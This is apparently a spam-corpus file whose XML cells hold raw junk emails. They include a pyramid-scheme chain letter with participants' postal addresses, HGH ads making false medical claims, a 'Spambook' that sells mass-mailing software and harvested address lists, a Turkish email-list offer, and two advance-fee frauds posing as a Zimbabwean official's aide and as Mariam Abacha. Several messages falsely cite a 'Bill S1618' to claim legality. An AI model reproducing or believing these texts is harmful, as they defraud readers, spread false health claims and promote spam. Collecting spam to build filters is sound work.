system in place.MULTI-LEVEL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there!"With network marketing you have two sources of income. Direct
commissions from sales you make yourself and commissions from
sales made by people you introduce to the business.Residual income is the secret of the wealthy. It means investing
time and money once, and getting paid again and again and again.
In network marketing, it also means getting paid for the work of
others.The enclosed information is something I almost let slip through my
fingers. Fortunately, sometime later I reread everything and gave
some thought and study to it.My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it!But like I was saying, in December I received this program. I
didn't send for it, or ask for it; they just got my name off a
mailing list. THANK GOODNESS FOR THAT!!!
After reading it several times, to make sure I was reading it
correctly, I couldn't believe my eyes.Here was a MONEY MAKING PHENOMENON.I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do:Your first goal is to receive at least 20 orders for Report #1
within 2 weeks of your first program going out. IF YOU DON'T, SEND
OUT MORE PROGRAMS UNTIL YOU DO.Your second goal is to receive at least 150+ orders for Report #2
within 4 weeks. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO.Once you have your 150 orders, relax, you've met your goal. You
will make $50,000+ but keep at it! If you don't get 150 right off,
keep at it! It may take some time for your down line to build.
Keep at it, stay focused, and do not let yourself get distracted.In less than one week, I was starting to receive orders for REPORT
#1. I kept at it - kept mailing out the program and by January 13,
1 had received 26 orders for REPORT #1. My first step in making
$50,000 in 90 days was done.By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security.If you are a fellow business owner and are in financial trouble
like I was, or you want to start your own business, consider this
a sign. I DID!  -Sincerely,  Jonathan RourkeP.S.  Do you have any idea what 11,700 $5 bills ($58,000) look
like piled up on a kitchen table? IT'S AWESOME!A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM:By the time you have read the enclosed program and reports, you
should have concluded that such a program, and one that is legal,
could not have been created by an amateur.Let me tell you a little about myself. I had a profitable business
for 10 years. Then in 1979 my business began falling off. I was
doing the same things that were previously successful for me, but
it wasn't working.Finally, I figured it out. It wasn't me; it was the economy.
Inflation and recession had replaced the stable economy that had
been with us since 1945.I don't have to tell you what happened to the unemployment
rate...because many of you know from first hand experience. There
were more failures and bankruptcies than ever before.The middle class was vanishing. Those who knew what they were
doing invested wisely and moved up. Those who did not including
those who never had anything to save or invest were moving down
into the ranks of the poor.As the saying goes, 'THE RICH GET RICHER AND THE POOR GET POORER."
The traditional Methods of making money will never allow you to
"move up" or "get rich". Inflation will see to that.You have just received information that can give you financial
freedom for the rest of your life, with "NO RISK" and "JUST A
LITTLE BIT OF EFFORT." You can make more money in the next few
months than you have ever imagined.Follow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them!Remember though, the more you send out the more potential
customers you will reach.So my friend, I have given you the ideas, information, materials
and opportunity to become financially independent.  IT IS UP TO
YOU NOW!"THINK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VAHERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU THOUSANDS OF DOLLAR$This method of raising capital REALLY WORKS 100% EVERY TIME. I am
sure that you could use up to $50,000 or more in the next 90 days.Before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office.This is the GREATEST Multi-Level Mail Order Marketing anywhere:
This is what you MUST do.1. Order all 5 reports shown on the list below (You can't sell
them if you don't have them).* For each report, send $5.00 CASH, the NAME &amp; NUMBER OF THE
REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR NAME &amp;
RETURN ADDRESS (in case of a problem).*MAKE SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE - IN CASE OF
ANY MAIL PROBLEMS!* When you place your order, make sure you order each of the five
reports. You need all five reports so that you can save them on
your computer and resell them.* Within a few days you will receive, via e-mail, each of the five
reports. Save them on your computer so they will be accessible for
you to send to the 1,000's of people who will order them from you.2.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work.a. Look below for the listing of available reports.b. After you've ordered the. five reports, take this Advertisement
and remove the name and address under REPORT #5. This person has
made it through the cycle and is no doubt counting their $50,000!c. Move the name and address under REPORT #4 down to REPORT #5.d. Move the name and address under REPORT #3 down to REPORT #4.e. Move the name and address under REPORT #2 down to REPORT #3f. Move the name and address under REPORT #1 down to REPORT #2.g. Insert your name and address in the REPORT #1 position.Please make sure you copy every name and address ACCURATELY! Copy
and paste method works well,.3. Take this entire letter, including the modified list of names,
and save it to your computer. Make NO changes to the Instruction
portion of this letter.Your cost to participate in this is practically nothing (surely
you can afford $25). You obviously already have an Internet
Connection and e-mail is FREE!To assist you with marketing your business on the internet, the 5
reports you purchase will provide you with invaluable marketing
information which includes how to send bulk e-mails, where to find
thousands of free classified ads and much, much more.Here are two primary methods of building your downline:METHOD #1: SENDING BULK E-MAILLet's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alone!Your total income in this example is $50 + $500 + $5,000+ $50,000
+ $500,000 for a total of $555,550!!!REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF THE 2,000 PEOPLE
YOU MAIL TO WILL DO ABSOLUTELY NOTHING AND TRASH THIS PROGRAM!
DARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE, OR HALF
SENT OUT 100,000 PROGRAMS INSTEAD OF 2,000. Believe me, many
people will do just that and more!REPORT #2 will show you the best methods for bulk e-mailing, and
e-mail software.METHOD #2 - PLACING FREE ADS ON THE INTERNET1.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below:1st level-your 10 members with $5 ....... $50
2nd level-10 members from those 10 ($5 x 100) ....... $500
3rd level-10 members from those 100 ($5 x 1,000).......  $5,000
4th level-10 members from those 1,000 ($5 x 10k) .......  $50,000
5th level-10 members from those 10,000 ($5 x 100k) .......  $500,000THIS TOTALS     -      $555,550Remember friends, this assumes that the people who participate
only recruit 10 people each. Think for a moment what would happen
if they got 20 people to participate! Most people get 100's of
participants.THINK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report!AVAILABLE REPORTS         *** Order Each REPORT by NUMBER, AND
NAME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problems).PLACE YOUR ORDER FOR THESE REPORTS NOW:REPORT #1 "The Insiders Guide to Advertising for Free on the Internet"ORDER REPORT #1 FROM:Tony Goon
120 - 8511 Westminster Hwy.
Richmond, BC. V6X 3H7
CANADA
REPORT #2 "The Insiders Guide to Sending Bulk E-mail on the Internet"ORDER REPORT #2 FROM:Julie Lind
Blk B 5-15,Prisma Perdana,
Jalan Midah 8 A,Cheras
56000 Kuala Lumpur,
MALAYSIA.
REPORT #3 "The Secrets to Multilevel Marketing on the Internet"ORDER REPORT #3 FROM:Mike IAT				
PO Box 11360,
50742 Kuala Lumpur,
MALAYSIA.
REPORT #4 'How to become a Millionaire utilizing the Power of 
Multilevel Marketing and the Internet"ORDER REPORT #4 FROM:Ken Leung
Flat B, 5/F, BLK 5,
Serenity Park, Tai Po, N.T.
Hong Kong
REPORT #5 "How to Send One Million E-Mails for Free."ORDER REPORT #5 FROM:Randy Dallard
P.O. Box 8
Osprey, FL 34229
U.S.A.About 50,000 new people get online every month!******* TIPS FOR SUCCESS ******** TREAT THIS AS YOUR BUSINESS! Be prompt, professional, and follow
the directions accurately.* Send for the five reports IMMEDIATELY so you will have them when
the orders start coming in. When you receive a $5 order, you MUST
send out the requested product/report.* ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.* Be patient and persistent with this program. If you follow the
instructions exactly, your results WILL BE SUCCESSFUL!* ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!******* YOUR SUCCESS GUIDELINES *******Follow these guidelines to guarantee your success:Start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response!If you don't receive 20 orders for REPORT #1 within two weeks,
continue advertising or sending e-mails until you do.Then,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business!Before you make your decision as to whether or not you participate
in this program, answer one question ...
DO YOU WANT TO CHANGE YOUR LIFE? If the answer is yes, please look
at the following facts about this program:1. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO
PRODUCE!2. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST ANYTHING TO SHIP!3. YOU ARE SELLING A PRODUCT WHICH DOES NOT COST YOU ANYTHING TO
ADVERTISE!4. YOU ARE UTILIZING THE POWER OF THE INTERNET AND THE POWER OF
MULTI-LEVEL MARKETING TO DISTRIBUTE YOUR PRODUCT ALL OVER THE
WORLD!5. YOUR ONLY EXPENSES OTHER THAN YOUR INITIAL $25 INVESTMENT IS
YOUR TIME!6. VIRTUALLY ALL OF THE INCOME YOU GENERATE FROM THIS PROGRAM IS
PURE PROFIT!7. THIS PROGRAM WILL CHANGE YOUR LIFE FOREVER.******* TESTIMONIALS*******This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NYIT IS UP TO YOU NOW!  Take 5 minutes to Change Your Future!ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO FINANCIAL
FREEDOM!FOR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requirements.Under Bill S1618 Title HI passed by the 105th US Congress this
letter cannot be considered spam as long as the sender includes
contact information and a method of removal. This is not a spam! Your are receiving this email either because, 
you have sent me and email in the past, or you are on a list of 
marketers requesting information. If this is not the case, 
PLEASE accept my sincerest apologies and reply with "remove" in the 
subject field at tonygremv@starmail.com. I will remove your name 
immediately! 
STOP! If you ever read another e-mail PLEASE take a moment to
read this one. This really is worth your valuable time.At the very least PRINT THIS OUT NOW to read later if you are
pressed for time.
 SSM1
7442MCPk0-l9--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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100% Free Porn!
What more can you ask for?
CLICK HERE
Â 
Â 
Â 
REMOVAL INSTRUCTIONS: We strive to never send unsolicited mail.
However, if you'd rather not receive future e-mails from us,
CLICK HERE to send email and add the word REMOVE in the subject line.
Please allow 48 hours for processing. [FRYTE^3247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs]
</t>
  </si>
  <si>
    <t>=============================================
Brand-New VERSION 7.0 Just Released:
Astounding New Software Lets You Find
Out Almost ANYTHING about ANYONE...
=============================================Download it right now (no charge card needed):For the brand-new VERSION 7.0, click here:
http://lv724super.supereva.it/gen.html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http://lv724super.supereva.it/gen.html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For the brand-new VERSION 7.0, click here:
http://lv724super.supereva.it/gen.html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found.For the brand-new VERSION 7.0, click here:
http://lv724super.supereva.it/gen.html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http://lv724super.supereva.it/gen.html 
If you no longer wish to hear about future
offers from us, send us a message with STOP
in the subject line, by clicking here:
mailto:remv0615a@bk.ru?subject=STOP_GN724 Please allow up to 72 hours to take effect.Please do not include any correspondence in your
message to this automatic stop robot--it will
not be read. All requests processed automatically. [:KJ)_8J7BJK9^":}H&amp;*TG0]</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</si>
  <si>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http://www282.wiildaccess.com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used.http://www282.wiildaccess.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
To "Opt-Out":http://www282.wiildaccess.com/optout.html0869rJKU9-021Irsi848l19
4277RtxO1-887Zecb8252kxVB8-521HKCX9386Mbpg6-812PqeJ6560NlfV1-018yhmw1788ZOTh2-726Gl77
</t>
  </si>
  <si>
    <t xml:space="preserve">
EVER YOUNG Nutritionals GH 2000 - Reverse Aging
Feeling 
    Young Is A Choice
Your Source For Anti-Aging 
    InformationHere's what doctors and users
            are saying about EverYoung
            Nutritionals GH2000 spray:
â€œAfter 2 weeks, I noticed a
            higher level of energy,
            increased sexual
            energy and my memory and
            vision were enhanced."
            Dr. Richard Boyd
            __________________            â€œWrinkles have disappeared
            from my hands and around
            my eyes; my beard, which
            was almost entirely white has
            returned to its original
            black color; sleep patterns have
            returned to those of my
            youth, I have sexually
            returned to my mid-teens.â€
            Dr. Mark Born
            __________________             "This is the second time I have
            ordered and I'm having great
            success with your product.
            I am 43, and was going through
            the yucky midlife stuff women go
            through...hot flashes, mood swings,
            etc. All that has stopped and feel
            great again. Was shocked to see
            my gray hairs go away in just a
            month. This product is amazing...
            Thanks again!" 
            Deanne in Alaska
.. 
... 
FREE U.S. 
          Fed Ex Ground
              Shipping &amp; Handling
              For Customers in
              The Continental USA.              We Ship Anywhere In The World!Starting 
              Today, You Can Look Younger, 
              Feel Better And Get Stronger With The
              Time-Tested Power of HGH
          Learn More
Somatotropin 
                    (aka Growth Factor, hGH, HGH, Growth Hormone, GH, Human Growth 
                    Hormone) is naturally produced by the anterior pituitary gland 
                    in the brain and declines with age, so it is a natural substance 
                    already in your body right this moment. HGH is known as the 
                    master hormone because it exerts effects over all other hormones 
                    in the body, including Testosterone, Estrogen, Progesterone 
                    and DHEA. Augmenting declining somatotropin levels by giving 
                    your body daily ingestible somatotropin, can create a more 
                    youthful hormone balance that results in dramatic improvements 
                    in your health.
                    Â  Somatotropin supplementation 
                    is a life-enhancement. Lives that were once shattered by fatigue, 
                    illness or the ravages of aging, now fourish with the help 
                    of somatotropin supplementation.
                    Â  Somatotropin from the pituitary 
                    works by stimulating protein production in all tissues of 
                    the body. This results in an increase in organ healing and 
                    regeneration, which is associated with increase resistance 
                    to illness and injury.
No matter your age, we GUARANTEE
                    you will look and feel BETTER than
                    you ever imagined possible.
LEARN MOREEVERYOUNG 
              GH2000
              The maximum FDA allowable HGH sold online that stimulates the anterior 
              of the pituitary gland. 2000ng per mil. Check the dosage of our 
              competitors.
ATOMIC 
              FUEL HGH Activator
              Works in conjunction with Ever Young GH2000 and stimulates the posterior of 
              the pituitary gland. Contains essential Amino Acids for a healthy 
              body.
BARLEY 
              GREEN Powder &amp; Caplet Tablets
              Most pure natural food for your living cells containing 18 Amino 
              Acids. Barley Green is an anti-oxidant and promotes alkalinity and 
              healthy cells
CLICK 
            HERE TO ORDER NOWHuman 
            Growth Hormone 
            (HGH) allows users to:Burn fat
            Build lean muscle
            Sleep better
            Lucid dreams
            Anti-aging
            Reduce cellulite
            Soften skin and wrinkles 
            Faster injury healing
            Improve vision
            Increase stamina
            Reverse osteoporosis
            Eliminate depression
            Eliminate chronic fatigue
            Improve exercise performance
            Reduce high blood pressure
            Sexual performance &amp; pleasure 
              Increase energy &amp; motivation
              Increase HDL (good cholesterol)
              Decrease LDL (bad cholesterol)
              Enhance immune functions
              Reduced joint pain &amp; stiffness
              Healthier, more lustrious hair
              ....and many more benefits
Visit our web site athttp://www.everyoung-gh.net    Your 
        privacy is extremely important to us.
        This message is sent to you because you were selected as a qualified recipient 
        of our 
        special introductory promotion for Ever Young Nutritionals GH2000 at
http://www.everyoung-gh.net        To be removed at any time simply, click
    here.*****--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Below is the result of your feedback form.  It was submitted by
 (YourPeach21@hotmail.com) on Wednesday, July 24, 2002 at 06:30:19
---------------------------------------------------------------------------:: For a limited time you can get a 100% FREE membership to the best sites on the internet. No telling how long this limited time offer will last Act Fast!If You Would Like To Be Removed Then remove---------------------------------------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,I'm a college dropout.  I work about two hours a day.  
I'm ambitious, but extremely lazy, and I make over 
$250,000 a year.  Are you curious yet?In a minute I'm going to tell you my secret,
it's the dirty little secret of the Internet ...You've probably heard stories about people making
whopping huge money online, but you thought they 
were the big corporate execs, famous programmers, or
boy-geniuses.Well, grasshopper, think again ...It's people like you and me that are making the real
money.  Yep, people like YOU AND ME!Ever since the "dot com bubble" burst in 1999, small-time
entrepreneurs are getting richer while the Fortune 500 
companies look for bankruptcy lawyers.Today small business owners and ordinary folks 
like you and me can use the web to achieve complete 
financial freedom with NO INVESTMENT and very little 
work.  How?  By learning the most profitable marketing 
technique ever created - it's called bulk email, or SPAM.If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 emailer who contacts you 
makes a six figure income on the Internet.  I 
guarantee it.  Now let's go back to Math 101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ZERO!Stop paying those outrageous auction listing fees when
hardly anyone sees your ad!Imagine that you have a decent product with a 
profit margin of $20.00 on each sale.  If you send 
an email ad to 500,000 people, and only one person 
in a thousand actually places an order, then you just 
generated 500 orders and made $10,000 in a few hours 
of work.  It's that simple ...All you have to do is convince ONE PERSON OUT OF A
THOUSAND to buy your stuff and you're FILTHY RICH.The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for?!I'm going to ask you four simple questions.  If you answer
YES to all of them, then I can almost promise that you
will make at least $100,000 using bulk email this year.Here goes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grind!All you need is ambition and commitment.  This
is no "get rich quick scheme".  You have to work
to make big bucks, but ANYONE - and I mean ANYONE - can do 
it.You're probably wondering if it's hard to get started.  
Don't worry, it's not! I will show you step-by-step 
how to start your first email campaign and how to
build a booming online business.  You'll be generating 
orders - AND MAKING MONEY - in less than seven days.Okay, so what if you don't have anything to sell?No problem!!  I'll show you where to find hot
products that sell like CRAAAAAAZY! Most people delay
starting an Internet business because they have 
nothing to sell, but I'm removing that hurdle right now.  
After reading the Spambook, you can build your complete 
product line in less than two hours!  There is NO EXCUSE 
not to get started! I will get you up-and-running within 
seven days. In fact ...I personally guarantee that you will start your own 
bulk email campaign less than a week after reading 
the Spambook!  I'll give you a toll-free phone number 
to reach me 24 hours a day, seven days a week; 
where else will you find that level of service?!I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go.As a special bonus, you'll recieve a FREE copy 
of our STEALTH MASS MAILER, a very powerful bulk 
email program which retails for $49.99! I'll even
include 7 million email addresses absolutely FREE
if you order NOW!Stop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Spambook! Once again, here's the deal.  You give me $29.99.  
I give you ALL THE TOOLS YOU NEED to become a
successful, high profit email bulk emailer.  INCLUDING:** THE SPAMBOOK
Teaches you step-by-step how to become a high profit
bulk emailer.  Secret techniques and tips never
before revealed.** SEVEN DAYS TO BULK EMAIL SUCCESS
Provides detailed day-by-day instruction to start sending
your first email campaign in seven days.** 600 Email subjects that PULL LIKE CRAZY** EMAIL LIST MANAGER
Manage your email lists quickly and easily.  Very 
user-friendly, yet powerful, software.** STEALTH MASS MAILER
Software can send up to 50,000 emails an hour automatically.
Just load them in there and click SEND!** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT
Extracts email addresses from databases and search engines
at speeds of over 200,000 per hour.** WORLDCAST EMAIL VERIFIER
Used to verify your email addresses that you extract to 
make sure they're valid.** EBOOK PUBLISHER
Easily publish your own e-books and reports for resale using,
you guessed it, bulk email!** SEVEN MILLION EMAIL ADDRESSES
This huge list will get you started bulk emailing right away.
I harvested these addresses myself, the list is filled
with IMPULSE BUYERS ready to respond to your ads!If you added up all of the FULL VERSION BULK EMAIL software
included with the Spambook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effort?Remember, you will recieve a toll-free phone number
for 24 hour expert advice and consultation FROM ME
PERSONALLY.To order the Spambook right now for only $29.99 with 
a Visa or Mastercard, please click on the link below. 
This will take you to our secure server for order 
processing:https://www.paypal.com/xclick/business=myblack93pgt%40hotmail.com&amp;item_name=Spambook&amp;item_number=Spambook&amp;amount=%2429.99Note: The Spambook will be delivered electronically
within 24 hours. It is not available in printed form. You may also pay with cash, check or money
order by printing the order form below and 
sending it with your payment. ------------------------- CUT HERE ----------------------- Product: "The Spambook" 
Price: $29.99 HOW TO ORDER BY MAIL: Print out this order 
form and send cash, personal check, money 
order or cashier's check to the address listed below: Blair Russell   
RR#2 Coulsons Hill Road #2452
Bradford, Ontario, Canada
L3Z 2A5Your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 
If paying by credit card, please fill in the information below: Credit Card Number:________________________________ 
Expiration Date:___________________________ 
Signature:_________________________ 
Date:____________________ 
IMPORTANT LEGAL NOTE: There are no criminal laws against
the non-fraudulent sending of unsolicited commercial email 
in the United States.  However, other countries have passed
laws against this form of marketing, so non-US residents 
should check local regulations before ordering.  To view
US State and Federal guidelines concerning bulk email, and to 
check foreign regulations, please visit http://www.spamlaws.com
8112Qkxd9-941DIFV3249esWe6-294Awtq1l33--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Remove yourself from this recurring list by:Clicking here to send a blank email to unsub-7552100-342@mm53.comORSending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063This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</si>
  <si>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TR Rehber 6 REKLAMLARINIZA SERVET Ã–DEMEYiN!!! UCUZ, KOLAY VE KALICI REKLAMLARINIZ iCiN BiZi ARAYINIZ...
    Bu ileti size islerinizi kolaylastirmak, satislarinizi arttirmak, kisacasi 
  milyonlara sesinizi duyurmak icin gÃ¶nderilmistir. Bu tÃ¼rden tanitimlarla 
  ilgilenmiyorsaniz bu iletiyi, "ilgilenecegini dÃ¼sÃ¼ndÃ¼gÃ¼nÃ¼z" tanidiklariniza 
  gÃ¶nderiniz. Bu iletinin size ve tanidiklariniza kazandiracaklarina 
  inanamayacaksiniz!.Herseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuzÂ listelerden cikmak istiyorsaniz 
  bu iletiyi bos olarak cevaplamaniz yeterli olacaktir.
  TÃ¼m Ã¶nerilerinizi dikkate alip degerlendiriyoruz.. LÃ¼tfen olumlu olumsuz 
  elestirileriniz icin web sayfamizdaki iletisim formunu kullaniniz..
Â 
TR Rehber 8.0 GÃ¼ncellenme Tarihi 10 Temmuz 2002'dir.. TR Rehber ve World Rehberi aldiginizda bir sonraki gÃ¼ncellemedeÂ  herhangi bir Ã¼cret Ã¶demeyeceksiniz.. Daha Ã¶nceden alis-veris de bulundugumuz mÃ¼sterilerimize %50 indirim imkani sunuyoruz..      Â 
.::Rehberlerimizin Ortak 
      Ã–zellikleri::.            Detayli kategorili ; daha fazla bilgi iÃ§in web sayfamÄ±zi ziyaret 
            ediniz..            ilave programlar ; mailling iÃ§in min. dÃ¼zeyde programlar..            Kullanimi kolaylaÅŸtÄ±rÄ±cÄ± tÃ¼rkÃ§e dÃ¶kÃ¼man ve video formatÄ±nda 
            aÃ§Ä±klamalar..Sanayi Rehberi 
Hediyeli..800.000 
Arama Motoruna  Ã¼cretsiz kayÄ±t 
  imkanÄ±..** SINIRSIZ telefon, e-mail ve icq ile 
            destek garantisi..TR Rehber 8.5400.000.000 TL.6.000.000 TÃ¼rk e-mail adresi..TR Rehber 7.0350.000.000 TL.4.000.000 TÃ¼rk e-mail adresi..TR Rehber Ã–zel
250.000.000 TL.2.000.000 Firma bazlÄ± e-mail adresi..World Rehber 2.5350.000.000 TL.            150.000.000 yabanci e-mail adresi..ICQ Rehber Ã–zel150.000.000 TL.2.500.000 TÃ¼rk ICQ kullanÄ±cÄ±si..Sanayi Rehberi50.000.000 TL.TÃ¼rkiye deki tÃ¼m firmalar..Â * TR ve WORLD Rehber birlikte 
            aldiginizda Hotmail Kullanici listesini 
HEDiYE ediyoruz..* Eski mÃ¼sterilerimize %50 indirimimiz 
            devam etmektedir..* Not: Fiyatlara KDV ve Kargo Ã¼creti 
            dahil edilmemiÅŸtir..
Â 
TR 8.0 ve World Rehber birlikte sadece 750.000.000 TL.Yerine 
      600.000.000 TL.
Â  GÃ¼ncelleme islemlerinde 
      ki indirim oranÄ±mÄ±z %50'dir. 
Â 
      800.000 Arama motoruna kayit islemi 30.000.000TL + KDV 
Â TÃ¼m 
      versiyonlarimizda gÃ¶nderim islemi icin gerekli ve en kullanisli programlar 
      bulunmaktadir. Bu programlarin video 
      formatinda aciklamalari da CD'ler icerisinde bulunmaktadir...
Â Bu programlar sizin 
      iletilerinizi kolay bir sekilde gÃ¶ndermenizi saglarken, iletilerinizi 
      alan kisilerin kullandigi serverlarin da yorulmamasini(karsi tarafta problem 
      yaratilmamasini) saglayacaktir...
Â 
Bu programlar ISP yada hosting firmanizin 
      SMTP serverini kullanmaniza gerek kalmadan direkt gÃ¶nderim yapabilmenizi 
      saglayacaktir. isterseniz bir checkbox'i isaretliyerek kullanmak 
      istediginiz SMTP server ileÂ  fault-tolerance yaparak gÃ¶nderdiginiz 
      iletilerin %100 yerine ulasmasini saglayabilirsiniz...
Â 
SMTP server kullanmadan gÃ¶nderdiginiz 
      mesajlar bilinenin aksine daha basarili gÃ¶nderim yapacakdir. CÃ¼nkÃ¼ 
      mesajlarin yerine ulasip ulasmadigini gÃ¶rÃ¼p mÃ¼dahele yapmak sizin elinizde 
      olacaktir...
Â 
Ayrica bu programlar HTML formatinda 
      mesaj gÃ¶nderimini de desteklemektedir. Bu destek sayesinde renkli, resimli 
      daha gÃ¶rsel ve dikkat cekici iletiler gÃ¶nderebilirsiniz...
Â CD icerisindeki bÃ¼yÃ¼k e-mail 
      listelerini kolayca dÃ¼zenleyebileceginiz, istenmeyen e-mail adreslerini 
      otomatik olarak silebileceginiz ve her tÃ¼rlÃ¼ kategoriye ayirabileceginiz 
      programlar da Ã¼cretsiz olarak verilmektedir...
Â TR rehber ve World 
      Rehberi birlikte aldiginizda, bir sonraki gÃ¼ncel versiyonlari adresinize 
      Ã¼cretsiz gÃ¶nderiyoruz... Bunun icin lÃ¼tfen gÃ¼ncelleme maili aldiginizda 
      bize geri dÃ¶nÃ¼nÃ¼z..
.:: 
  HEDEF KiTLE TESPiDi ::.Hedef kitlenize ulasmanizi saÄŸlayaciÄŸimiz bu 
    Ã¶zel yÃ¶ntem hakkinda mutlaka bilgi isteyiniz...:: TARGET MAILLING ::.
iletisim Bilgileri : ( Pazar haric hergÃ¼n 09:00 ile 19:30 arasi)GSM:+ 90 535 482.97.19Â  GÃ¶khan 
      ATASOYTAKLiTLERiMiZDEN SAKININ, GARANTiSi OLMAYAN Ã¼RÃ¼NLER, HiZMETLER KARiYERiNiZi ZEDELEYEBiLiR.. Â GÃ¼nÃ¼mÃ¼z 
  TÃ¼rkiye'sinde internet 
  araciligiyla yapilan reklamlar hizla artmaktadir. TÃ¼rkiye'de ve dÃ¼nyada bircok 
  firma bu yÃ¶ntemlerle kendini tanitmaktadir.Bu artisin icinde sizin de yeralmaniz 
  kacinilmaz bir gercek olacaktir.
Herseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz
      Â listelerden cikmak istiyorsaniz 
uyeiptal@gmx.netÂ 
      adresine boÅŸ bir mail gÃ¶ndermeniz yeterli olacakdÄ±r.-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Sitescooper-talk mailing list
Sitescooper-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">
Shopping for a loan 
      has never been easier
Â 
Get a free quote on a new First 
      Mortgage, Second Mortgage, or a Credit Line with no cost or obligation.
We can help you get a great loan 
      regardless of your credit situation
It's a great time to buy or 
      refinance your home.
Whether you want to:
Buy a new home - consolidate your 
      debts
Refinance to lower your payments
Take some equity out of your home 
      for any reason
We can help!Click here and get a free quote!
You have nothing to lose!
Â To not receive this 
      email again click here</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</si>
  <si>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cocolhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">FROM:ZIMMY MABO.
TEL:0031-623-787-971.                   
E-MAIL:infoeurope@lycos.com.
THE NEDERLANDS.
         SOLICITING FOR A BUSINESS VENTURE AND PARTNERSHIPBefore I proceed.Am greatful to introduce my self, My name is MR ZIMMY MABO a zimbabwean.I was formaly a personal aid to PRESIDENT ROBERT MUGABE,Due to my position and closeness with the President. I absconded with sum of TWENTY FIVE MILLION UNITED STATES DOLLARS (US$25,000,000)Which was part of the money meant for campaigning for president Robert Mugabe's re- election into office under Zaunpe party.Presently I have been able to move the funds diplomatically to a security company in the Netherlands. MY REQUEST:I am looking for a trustworthy individual or firm to advice me in the right investment as well as to provide account where the funds will be lodge into.Moreso,I am interested in buying propertys for residence as my family will be residing there in the near future.COMMISSION AND REMUNERATION:As regards your commission and remuneration,I have decided to offer you 25% and also 5% for all your expenses(telephone bills, travelling expenses, hotel bills and other expenses incurred).NOTE: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deposited.I strongly believe that associating with you to embark on this and other business ventures will derive a huge success hereafter and it will be a long lasting business association.
 YOURS TRULY,
 MR.ZIMMY MABO.
_____________________________________________________
Supercharge your e-mail with a 25MB Inbox, POP3 Access, No Ads
and NoTaglines --&gt; LYCOS MAIL PLUS.
http://www.mail.lycos.com/brandPage.shtml?pageId=plus 
</t>
  </si>
  <si>
    <t>(See Disclaimer below)
Dear Internet Marketers,
Explode YOUR Sales OVERNIGHT Guanranteed!!!! Introducing YOU The Worlds Easiest, Most Powerful Blasting System!
Absolutely Hands FREE! Set it up and Forget it for LIFE!Blast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peacebuponu2@yahoo.com.sg with a word"YES Send The Link NOW"  in the subject field.
(((((((((((((((( DOUBLE THE SPEED OF YOUR PC ))))))))))))))))))))
                          The Insider PC SecretsLearn exactly how to get more speed and efficiency out 
of your PC without spending a single cent on hardware!((((((((((((((((( DOUBLE THE SPEED OF YOUR PC )))))))))))))))))))
Get the cheapest Web Host in town for only $35 per year!                         
                           PLUS
Get your FREE email software NOW!
(((((((((((((((((((((((((((((((((((((((((((((((((((((((((( DISCLAIMER )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))You are receiving this message for one of the following reasons: 1) we are on the same opt-in list; 
2) you posted your ad to one of my FFA pages; 
3) you have responded to one of my ads; 
4) you have sent an e-mail to one of my addresses 
5) you visited one of my sites By doing so, you have agreed to receive this message. Under Bill s. l6l8 TITLE III passed by 
the 105th US Congress this letter Cannot be considered Spam as long as the sender includes 
contact information &amp; a method of "removal". If you are receiving this email by mistake, please 
accept our apologies. To be removed simply send blank email to  peacebuponu2@yahoo.com.sg 
with a word "remove" in the subject field.  Many thanks for your kind consideration. ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((( DISCLAIMER )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, jm@netnoteinc.com
Human 
Growth 
Hormone 
TherapyLose 
weight while 
building 
lean 
muscle 
massand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subscriberto the 
Opt-In 
America 
Mailing 
List. 
To remove 
yourself from all related 
maillists,just Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR SIR,I am MRS MARIAM ABACHA, wife of the late Nigerian
Head of State, General Sani Abacha who died on 
the 8th
of June 1998 while still on active duty. I am
contacting you in view of the fact that we will 
be of
great assistance to each other likewise 
developing a
cordial relationship.I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abroad.No record ever existed concerning the money 
neither is
the money traceable by the Government because 
there is
no documentation showing that we received the 
money
from the Russians.Due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response.Best personal regards,MRS MARIAM ABACHA.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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DEAR SIR,I am MRS MARIAM ABACHA, wife of the late Nigerian
Head of State, General Sani Abacha who died on 
the 8th
of June 1998 while still on active duty. I am
contacting you in view of the fact that we will 
be of
great assistance to each other likewise 
developing a
cordial relationship.I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abroad.No record ever existed concerning the money 
neither is
the money traceable by the Government because 
there is
no documentation showing that we received the 
money
from the Russians.Due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response.Best personal regards,MRS MARIAM ABACHA.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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kideesh--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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BODY { FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif }
